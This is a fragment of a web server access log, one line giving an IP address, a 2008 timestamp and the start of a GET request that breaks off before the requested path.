203.56.255.14 - - [07/Aug/2008:13:16:15 -0700] "GET